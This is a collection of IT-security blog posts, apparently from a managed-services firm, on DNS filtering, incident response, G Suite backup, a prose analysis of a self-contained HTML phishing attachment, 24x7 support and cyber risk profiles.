How It Works: DNS Filtering

There are certain organizations, mainly Internet Service Providers, that purchase hardware and software solutions that sit between users and the Internet. DNS filters allow users to filter out certain domains without having to purchase any hardware. Most corporate offices have firewalls that help protect the network, but what happens when an employee is working from home, travelling, or is sitting in a coffee shop?

How Does It Work?

Domain Name System (DNS) is a service that allows easy to remember domain names to be associated with unique IP addresses – such as – rather than typing in very difficult to remember IPs like

Briefly, when a domain is purchased from a domain registrar and that domain is hosted, it is assigned a unique IP address that allows the site to be quickly located. When you attempt to access a certain website, a DNS query is performed. Your DNS server will search for the IP address of the domain, which will allow a connection to be made between your browser and the server where the website is hosted. Once the connection is complete, your browser will display the webpage.

DNS filtering is a technique of blocking access to certain websites, webpages, or IP addresses.

With DNS filtering in place, the DNS server will not return the website even if its IP exists, the request will be checked first. Every time a webpage or IP address is known to be malicious and blacklisted or is determined to be potentially malicious by the web filter, DNS blocking occurs. So, instead of being connected to the website the user is attempting to access, he/she will be redirected to a local IP address that displays a page explaining why the website cannot be accessed.

Since DNS filtering is low latency, there should be no delay in accessing websites that do not breach your organization’s security policies.

How efficient is a DNS Filter?

Unfortunately, DNS filtering cannot block all malicious websites, because in order to do so, a website must be determined to be dangerous. If a hacker launches a new phishing website, there will always be a delay between when the page is created and the moment it is checked and added to a blacklist.

Can DNS Filtering Be Bypassed?

It can be. Proxy servers and anonymizer websites could be used to mask traffic and bypass the DNS filter unless the chosen solution also blocks access to these servers and websites. For a Proxy server you will need to know its IP address and you can get that from your Web server’s logs.

For most Internet users, a DNS filter will block any attempt to access forbidden or harmful website content.

Cybersecurity is much more complex, especially nowadays, so there is no single solution that will allow you to block 100% of malicious websites, but DNS filtering should certainly be part of your cybersecurity plan as it will block most malicious websites.

Why The First Few Hours After A Cyberattack Are The Most Important?

In case of a data breach, it’s crucial to limit its effects as soon as possible. Each delay increases the chances of evidence being lost and decreases the chances of a cybercriminal being caught. The longer it takes your staff to notice and react to a cyber-attack, the higher its severity.

Time is of the essence.

In case of a successful cyber-attack, what you do in the first few hours after the attack can either save or break your business.

Living in a state of perpetual concern can be beneficial to the security of your organization. Former Intel CEO Andrew Grove once stated that “only the paranoid survive”. So, knowing all you can about possible future attacks and your organization’s vulnerabilities will help you understand how you need to prepare.

Just imagine that a hacker has remotely attacked your organization with a trojan that allows him to easily extract business data. With network monitoring and modern security controls in place, this incident can be detected and mitigated before it causes too much damage. However, if your business lacks a proper incident response plan, or simply doesn’t have enough visibility into its network, hackers are able to irreparably compromise your business.

Left unchallenged, cyber criminals can steal as much data as they desire.

You need a comprehensive crisis response plan to cover as many scenarios as possible.

It is imperative to have security protocols in place for logging, documenting, and reviewing the incident. This includes information about the incident (time of occurrence, type) actions taken to mitigate the incident, compromised systems etc. It should be crystal clear to anyone reviewing your documentation what happened and what your designated staff did in response.

You need a communication plan.

Communication during any crisis is paramount. Pre-approved messaging templates can be useful allowing employees to share information about the incident and avoid getting stuck with copywriting and approvals.

Also, you should implement a dedicated communications system which has no connection to your day-to-day business operations.

You need to prioritize.

Do I have a backup that hasn’t been destroyed? Which system do I need to rebuild first? How do I restore from a backup if my systems are compromised? Where are the encryption keys for that backup?

It is crucial for C-level executives to work closely with the IT department to highlight the priorities of what the business needs to stay operational. This could include a document management system, the email service, the financial system etc. Not all systems can have top priority in recovery.

Recover fast.

Once you identify a priority, it is important that all required staff focus on the restoration process one problem at a time.

For almost every system, there are several dependencies or other systems your team needs to rebuild first. For instance, dependencies for an email service could include several email servers, DNS servers, an Active Directory server, a desktop or remote active sync that can connect to retrieve emails and so on.

Reduce risk factors.

You need to know for sure why your systems went down. Not fully understanding the root cause may put your business in the same difficult situation few moments later as you reinstate systems back onto the network.

Layering the security controls and mitigations with consecutive levels of protection will minimize the risk of a successful cyberattack hence preventing critical data leaks.

Also, when it comes to risk, don’t forget about your employees. It’s not just the technology and business operations. Staff will be working hard, and you need them to be security aware more than ever before. Employee security training is crucial.

Bottom line.

Unfortunately, cybercriminals are difficult to identify and even more difficult to prosecute. While it’s certainly true that a quick response increases the chances of a successful criminal investigation, the chances that such an investigation will come to a dead end are even higher.

At the end of the day, the most important element of how quickly your business reacts and recovers after a cyberattack is your staff.

The above aside, the best thing you can do is to practice good security hygiene. Strong access controls and monitoring tools are mandatory.

For more information on how we can help your business prepare for, respond to, and recover from a disruptive cyberattack, please visit our IT security services page and feel free to contact us.

GSuite Back-Up and Recovery

There are users who believe Google Vault is THE solution for G Suite data backup and recovery, but is it?

Firstly, what is Google Vault?

Google Vault is a native GSuite application that allows organizations to archive data, implement retention rules, preserve users by placing legal holds, search the organization’s data using several search operators, review actions of Vault users through audit reports, and also export data for further processing.

Some Google administrators believe that Vault is a “good enough” solution to use for backup and restore, as well as eDiscovery and archiving. While Vault is indeed a good solution for data retention for legal needs, it doesn’t meet the primary criteria for backup and restore, data availability and business continuity. In fact, Google notes that:


“If you delete a user, all the data associated with the user’s account will be removed from Google.”


So, Vault wasn’t designed to perform rapid, granular restores because it’s not a backup solution by definition; however, it can potentially restore lost data in certain situations.

The most important aspect when distinguishing Google Vault from a genuine backup solution is that Google Vault’s main function is to archive and retain data so that it could be easily located in the future.

Intrinsically, backup solutions preserve data integrity by continuously producing a copy that may be replaced if the primary data is compromised. Attempting to use Google Vault for backup purposes will ultimately prove unprofessional because it would be inefficient and unsatisfactory. In any business, data availability is key, so restoring from a backup should be performed as fast as possible.

Does G Suite backup automatically?

Google does back up your GSuite data in order to guarantee that your data remains accessible but in accordance with their own internal backup and disaster recovery plans. However, these backups are not available to admins or end-users and exist just to safeguard Google’s products and services from disasters, accidents etc. Therefore, Google doesn’t protect your business data from intentional or accidental user deletion, programmatic errors, malware, etc.

How long Gmail will keep your emails?

Gmail will retain all emails that reach the inbox indefinitely, as there is no stated policy of deletion upon reaching a certain age. Bottom line, emails can be kept forever unless they are deleted by the user.

Once an email has been deleted, it will reside in the trash folder for a period of 30 days in which a user may recover the email before it is deleted permanently. Similarly, email that is identified as Spam by Gmail will be automatically deleted after a 30-day interval.

Can someone recover permanently deleted emails from Gmail?

GSuite admins may be able to recover the emails by using one of two ways:

  • Emails may be restored from the Admin console within 25 days of deletion. After the 25-day period, the data is removed forever.
  • Mailboxes (including deleted messages) from the past 30 days can be retrieved using the Email Audit API.

After 25-30 days, not even G Suite administrators can recover emails without a viable backup and recovery solution in place.

Get complete protection for your business

Having your GSuite fully backed-up provides a multi-layered approach to security against ransomware, compliance needs such as HIPAA, and advanced recovery features.

Unfortunately, it’s a common misconception among SaaS/Cloud users that doing back-ups isn’t necessary for their data because it already exists in the cloud. As previously mentioned, native GSuite and Office 365 apps don’t protect business data against human error, phishing emails, malware etc. Ransomware attacks, especially in the cloud, are on the rise, and we all know how popular phishing scams have become.

Therefore, you need a dedicated solution to further improve the security of your business data. One that includes:

  • automated backups (at least once a day) that capture point-in-time (PIT) snapshots of each users’ relevant app data, with the option to perform additional backups at any time.
  • unlimited storage space
  • detailed activity log with all administrator and user action records.

SaaS/Cloud providers protect your data from hardware failure, software failure, power outages and natural disasters while StratusPointIT can help protect business data from human error and malicious acts from internal or external sources. As a result, your GSuite data (Mail, Contacts, Calendar, and Drives) will be secure (data encryption both at rest and in transit), easily recoverable, and fully protected.

Microsoft Docs Login Form Phishing Scam: Overview

Phishing e-mail campaigns are used to steal sensitive data such as login information and usually their success depends on a user clicking a link which leads to a phishing website that looks like a regular login page. However, not all phishing campaigns use remote websites as we are about to see.

Scammers continue to surprise us with their methods.

Several email users across the country have recently reported that they received emails that looked like traditional payment notifications phishing with a fairly usual text: “Good day, please find attached a copy of your payment notification.” The HTML attachment (invoice.html or payment.html) it carried turned out to be anything but usual, instead it redirects the browser to a fake login page.

So, when opening the 930 kb file in a regular text editor, right after the first line – <! — Internal Server Error –> there are more than four thousand empty lines followed by a lot of obfuscated JavaScript code (more than 500k characters).

The next step is to load the website in a browser. After opening the file in Firefox, it became obvious why the script was so large. Unlike most other HTML-based phishing attachments, this one didn’t depend on an external fake login page but carried the entire thing within its body.

Although the page was supposed to look like a Microsoft Docs page, the scammers provided a list with multiple valid e-mail providers such as Gmail, Yahoo, AOL, Hotmail, Office365 etc. one could use to “log in”.

The catch for such a scheme to work is to create a page that looks genuine and inspires trust for users to fill in their login information. From our observations, in this particular case, scammers did a pretty good job as the page under examination feels authentic.


MS login page


After the user supplies an e-mail and a password, the website appears to connect the session to the e-mail server, but actually, it sends a HTTP GET request containing login data specified by the user to a remote web server at hxxp://


GET request


Subsequently, an additional request for a phone number and a recovery e-mail is displayed to the user. When those fields are filled in as well and sent to the same domain as before, although this time using a POST request, the browser is redirected to a low-quality picture of the supposed invoice and right after that the page is redirected again, but this time to either a genuine Microsoft website or to the domain specified in the recovery e-mail supplied by the user.

Sending user’s login information to a server and then redirecting the browser to a legitimate web page is normal behavior for a phishing page. Although, in this case the phishing page not only steals the credentials but also transfers them online without any encryption in plain HTTP to a remote location.

Besides that, what is unusual about this phishing is the fact that the entire phishing page was delivered as an attachment. We believe that this was intended to avoid email security filters and analytics on web proxies. Also, by generating the landing page locally, the attackers reduce the risk that their landing page will be discovered and removed, but whatever the reason was, their M.O. is quite ingenious.

However, this isn’t the first phishing scam with a similar “self-contained” website, but this was the first time we came across such a complex HTML phishing attachment that carried all the scripts and files in one package and didn’t depend on a remote server for anything else than for collecting the stolen credentials.


At StratusPointIT, we support all our customers by offering them guidance, training and professional IT security features to prevent advanced cyber-attacks such as this one from compromising their systems.

Few Reasons Why 24×7 Network & Server Support Is Mandatory

Imagine what happens if your organization’s network or server(s) suddenly goes down one night? In case you didn’t plan something, there are two scenarios: either incredibly high over-time costs or solving the issue/s during the workday.

Having 24×7 monitoring of your network and server(s) will ensure that your organization can keep working around-the-clock and that every IT issue is solved as it comes up, avoiding a destructive cascade of failures.

Procure an Instant, Experienced Support Team & Save Money

Rather than having to rely on one or two IT employees, a company with a managed IT service solution expanding network, server, and help desk support has immediate access to a qualified, experienced team. Its members will be able to quickly identify the source of the problem and resolve it in a timely manner, so that your organization doesn’t experience substantial business disruption.

A managed IT service solution will free up your IT staff, so that your IT department can focus on more important issues. That means you won’t be paying your IT team overtime, instead, you’ll be able to use their knowledge and experience to optimize the existing infrastructure looking for new technologies to improve business operations.

Businesses today cannot afford downtime

When their IT infrastructures get hit, their internal workflow will stop, and organizations will be unable to deliver their products/services to their waiting clients, losing money and getting their brand affected as a result. Some companies can suffer hits and overcome episodes like these, others can’t.

Technical problems may occur. Hardware/software issues are always a possibility. Of course, not every IT support issue can cause a disaster and not every issue is urgent, but how your IT Help Desk responds is crucial because it can make the difference between a little hiccup and a massive business interruption.

Here are two key reasons why 24×7 network and server support should never be optional.

24×7 Monitoring

People may stop working on nights or over weekends, but systems don’t. Your help desk should be teamed with 24×7 remote monitoring catching little IT issues before they become big ones, in many cases before you’re even aware there’s an issue.

With 24×7 monitoring, there’s a good chance that your help desk will already be aware of the problem you’re experiencing and are actively working to resolve it.

Urgent Issues

This may seem like a costly luxury, but it’s not. The team providing 24×7 monitoring can also provide 24×7 support in much the same way that grocery stores can stay open all night since employees are already there stocking shelves.

Of course, your team may not always be working nights and weekends, but when they are, it’s probably for an important reason. The last thing they need is to be blocked because they can’t get support.


24×7 Network and Server Support is not a luxury, but rather a requirement. A requirement that will avoid hassles and keep your team happy and productive.

Why Businesses Need to Create a Risk Profile to Prevent Cyberattacks

Think about the last time you were afraid of something. Did you approach the situation rationally? If so, you’re in the minority. Most people are terrible at being rational when afraid. And where cybersecurity is concerned, that’s exactly what criminals are counting on. 

In 2018, the Data Science Institute at Columbia found that surgeons under stress tend to make up to 66 percent more mistakes in the operating room. You’re probably wondering what, if anything, this has to do with cybersecurity. A great deal, actually.

It’s proof positive that even medical professionals are prone to error when under extreme stress. The cybersecurity industry is no different.

There’s no shortage of sensationalism around the cybercrime industry. You can’t even turn on the news without hearing about some new and terrible threat facing the digital world. To hear the media tell it, cybersecurity is an industry in a perpetual state of crisis.

A looming talent shortage and overworked employees. Irreducibly complex and sophisticated cyberattacks led by state-sponsored black hats. Unstoppable botnets that can bring the entire Internet to its knees. Powerful tools like ransomware-as-a-service that allow even the least tech-savvy of individuals to execute advanced attacks.

These are all things that are happening, true. And they’re extremely intimidating to think about. If a well-funded black hat organization were to set its sights on your business, there would be little you could do.

The thing is, devastating cyber-incidents like the ones we see so frequently online?  They are not the norm. They’re just what makes headlines.

In actuality, the vast majority of cyber-attacks and data leaks are neither complicated nor targeted. They are shotgun cyberattacks that effectively throw malicious software and attack vectors at the wall to see what sticks. If you don’t want to take my word for it, have a look at the stats below.

What I’m trying to say is that too often, corporate cybersecurity veers to one of two extremes. Either we get sloppy because we think it can’t possibly happen to us, or we become paranoid, terrified at the dangers that exist on the web. Neither is the correct path.

Instead, businesses need to create and analyze their risk profile. They must endeavor to understand their unique organizational workflows, data requirements, and security threats. And perhaps more importantly, they must take a proactive role in both enabling employees and protecting corporate assets.

This is not something that can be done from a place of fear, stress, or paranoia. It needs to be careful, measured, and well planned. It needs to be an organization-wide, multi-departmental approach as well. That way, you don’t have a single group of people shouldering the burden for absolutely everyone.

About the Author:

Tim Mullahy is the Executive Vice President and Managing Director at Liberty Center One, a new breed of data center located in Royal Oak, MI. Tim has a demonstrated history of working in the information technology and services industry.